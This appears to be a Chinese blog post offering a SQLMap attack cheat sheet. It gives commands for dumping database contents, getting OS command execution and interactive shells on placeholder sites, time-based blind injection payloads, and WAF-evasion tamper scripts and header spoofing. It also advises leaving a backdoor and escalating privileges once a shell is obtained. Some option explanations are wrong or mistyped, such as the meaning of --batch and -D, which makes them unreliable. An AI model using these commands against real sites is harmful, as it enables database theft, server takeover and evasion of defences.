SQLMap注入常用

1.SQLMap注入指定数据库、操作系统 使用获取数据库信息,主要使用的命令包括如下几条:

(1)指定网页的数据库、操作系统  --dbms mysql5.0 --current-db

(2)获取当前库名 --current-db

(3)获取该库中的表名-D “数据库名”--tables

(4)获取该库中的列名-D “列名”-T “表名” --columns

(5)获取该库中的某个列名的字段内容 -D “列名” -T “表名” -C “列名” --dump

2.SQLMap之交互式写shell及命令执行 

运行任意操作系统命令 :


执行系统命令(windows系统): --os-cmd 

python sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfig

sqlmap 支持模拟 shell 输入,你可以输入任意命令以执行。对应的选项是 --os-shell,并且和 --sql-shell 一样,具备 TAB 补全和记录历史命令的功能。

执行shell: --os-shell

python sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --os-shell


使用获取数据库信息,主要使用的命令包括如下几条:

(1)进行交互式写shell及命令执行 -p id  ==> --os-shell

(2)获取当前库名 --current-db

(3)获取该库中的表名-D “数据库名”--tables

(4)获取该库中的列名-D “列名”-T “表名” --columns

(5)获取该库中的某个列名的字段内容 -D “列名” -T “表名” -C “列名” --dump

python sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfigpython sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfig

sqlmap 支持模拟 shell 输入,你可以输入任意命令以执行。对应的选项是 --os-shell,并且和 --sql-shell 一样,具备 TAB 补全和记录历史命令的功能。

进入shell界面 查看是否有管理员权限并留后门提权

3.伪静态一般URL地址格式:

1. http://test.com/php100/id/1/1

2. http://test.com/php100/id/1.html

非伪静态一般URL地址格式:

http://test.com/php100/test.php?id=1

1.python sqlmap.py -u http://www.any.com/lwcms/35*.html --current-db 在sqlmap中伪静态哪儿存在注入点就加*。使用--current-db参数是用于指定当前命令的输出结果是该网站使用的数据库名称。

4.SQLMap之请求延时注入

所谓延时注入主要针对页面无变化,无法用布尔真假判断,无法报错的情况下注入。延时注入是通过页面返回的时间来判断的,不同的mysql数据库版本,延迟注入语句也不同。

mysql >=5.0的可以使用sleep()进行查询;

mysql<5.0的可以使用benchmark()进行查询。

请求延时注入的核心思想:

 if(payload,sleep(3),1)

即payload正确时,程序暂停3秒。否则立刻执行。

 if(payload,1,sleep(3))

即payload正确时,程序立刻执行,否则暂停3秒。

备注:这里payload是指构造的参数数据。

--technique是用于指定sqlmap注入方式的参数,主要有以下几类:

B: Boolean-based blind SQL injection(布尔型盲注)

E: Error-based SQL injection(报错型注入)

Q:Inline queries injection(内联查询)

U: UNION query SQL injection(联合查询注入)

S: Stacked queries SQL injection(可多语句查询注入/栈查询)

T: Time-based blind SQL injection(基于时间的盲注)

猜数据库

python sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --technique T --time-sec 9 --current-db

(--time-sec参数设定延时时间,默认是5秒)

5. SQLMap之绕过WAF防火墙

1.绕过WAF防火墙的脚本  

sqlmap -u {目标URL} --dbs --batch --flush-session  --tamper=space2hash.py,modsecurityversioned.py

脚本总类:

apostrophemask.py#用utf8代替引号

equaltolike.py#MSSQL * SQLite中like 代替等号

greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号

space2hash.py#空格替换为#号 随机字符串 以及换行符

apostrophenullencode.py#MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号

halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符;

appendnullbyte.py#Microsoft Access在有效负荷结束位置加载零字节字符编码;

ifnull2ifisnull.py#MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

space2mssqlblank.py(mssql)#mssql空格替换为其它空符号

base64encode.py#用base64编码

space2mssqlhash.py#mssql查询中替换空格

modsecurityversioned.py#(mysql中过滤空格,包含完整的查询版本注释;

常用脚本:space2morehash.py space2hash.py base64encode.py charencode.py

2. 脚本参数组合策略绕过

以mysql绕过为例,

sqlmap -u {目标URL} --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

sqlmap -u {目标URL} --random-agent --hpp  --tamper=space2mysqldash.p,versionedmorekeywords.py

--hpp含义是使用 HTTP 参数污染。HTTP 参数污染(HPP)是一种绕过 WAF/IPS/IDS 保护机制(这里有相关介绍)的方法,针对 ASP/IIS 和 ASP.NET/IIS 平台尤其有效。如果你怀疑目标使用了这种保护机制,可以尝试使用此开关以绕过它。

--random-agent 使用随机选定的HTTP User - Agent头

-v #详细的等级(0-6)

0:只显示Python的回溯,错误和关键消息。

1:显示信息和警告消息。

2:显示调试消息。

3:有效载荷注入。

4:显示HTTP请求。

5:显示HTTP响应头。

6:显示HTTP响应页面的内容

--delay 延迟的时间


备注:这些组合策略可以根据注入的反馈信息,及时调整组合策略

--batch:要求不对目标写入

--tamper:使用干预脚本

注意:若不使用3等级无法继续下一步操作。因为WAF可能采用白名单规则,所以对于选择哪种策略,重点是根据-v 3 提示的信息进行判断,可以抓取主流的浏览器的user-agents适当的延时,加上注入字符转换---大小写、空格、字符串、注释、加密等等方式。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 217,509评论 6 504
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,806评论 3 394
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 163,875评论 0 354
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,441评论 1 293
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,488评论 6 392
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,365评论 1 302
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,190评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,062评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,500评论 1 314
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,706评论 3 335
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,834评论 1 347
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,559评论 5 345
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,167评论 3 328
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,779评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,912评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,958评论 2 370
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,779评论 2 354

推荐阅读更多精彩内容